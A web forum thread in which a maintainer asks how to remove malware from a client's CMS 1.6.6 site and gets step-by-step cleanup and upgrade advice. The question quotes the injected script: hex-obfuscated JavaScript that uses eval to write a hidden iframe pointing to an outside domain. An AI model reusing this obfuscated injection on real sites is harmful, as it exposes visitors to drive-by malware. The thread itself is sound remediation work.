A clients site is running 1.6.6.
They are having a problem with Malware warning.
Code such as below was found on the index.php page, and I can see it in the source code for the login page.
I simply removed it from index.php, but how do I get rid of it from the login (and possibly other) admin pages?
Didn't want to simply update the CMS version, in-case I wasn't helping?
Any advice appreciated.
Problem code (I think..)
<__script__>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</__script><__script__>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</__script>
Malware problem, help needed.
Re: Malware problem, help needed.
Not sure if you've received a reply to this yet, but the malware can be (and usually is) in more than just the index.php file, so just cleaning it from there may not resolve the problem.
Here are a few things I would do if I was in your shoes:
- Take your current site offline by placing a static page (index.html) for now
- Make a copy of the site (as it is today) and a copy of the database (full backup)
- Remove the CMS site files from the current site, so the potential hole does not continue to stay in place
- Install the copy in a separate location (test site), like a local machine
- Unpack a copy of the 1.6.6 distribution over this copy, thus overwriting CMS files that may have been corrupted
- Also review the folders and remove any that are not in the original distribution
- Look in the uploads folder for strange and unexpected files and folders, and remove them
- Now launch and test the test site - if everything looks good, move the files and database back to the live site and remove the static placeholder index.html
The problem is that the security hole that allowed the malware to take hold may still exist, since you've not fundamentally changed anything (same host, same CMS version). Ideally you would take this opportunity to upgrade to the latest version of the CMS - unfortunately in your case you may have to do a series of database schema upgrade (someone more familiar with this on the forum can given you more details).
Also you should take this opportunity to make sure there are no security loopholes in your hosting service - this has been know to happen from time to time especially on shared hosting servers. You can start with making an inquiry with your hosting technical support.
Hope this helps.
S
Here are a few things I would do if I was in your shoes:
- Take your current site offline by placing a static page (index.html) for now
- Make a copy of the site (as it is today) and a copy of the database (full backup)
- Remove the CMS site files from the current site, so the potential hole does not continue to stay in place
- Install the copy in a separate location (test site), like a local machine
- Unpack a copy of the 1.6.6 distribution over this copy, thus overwriting CMS files that may have been corrupted
- Also review the folders and remove any that are not in the original distribution
- Look in the uploads folder for strange and unexpected files and folders, and remove them
- Now launch and test the test site - if everything looks good, move the files and database back to the live site and remove the static placeholder index.html
The problem is that the security hole that allowed the malware to take hold may still exist, since you've not fundamentally changed anything (same host, same CMS version). Ideally you would take this opportunity to upgrade to the latest version of the CMS - unfortunately in your case you may have to do a series of database schema upgrade (someone more familiar with this on the forum can given you more details).
Also you should take this opportunity to make sure there are no security loopholes in your hosting service - this has been know to happen from time to time especially on shared hosting servers. You can start with making an inquiry with your hosting technical support.
Hope this helps.
S
Re: Malware problem, help needed.
Hi spcherub,
Thanks for the reply. Pretty well what I was thinking of doing, so will follow the steps and see how I go. It is certainly time to upgrade their CMS version.
Thanks again for the help.
Thanks for the reply. Pretty well what I was thinking of doing, so will follow the steps and see how I go. It is certainly time to upgrade their CMS version.
Thanks again for the help.
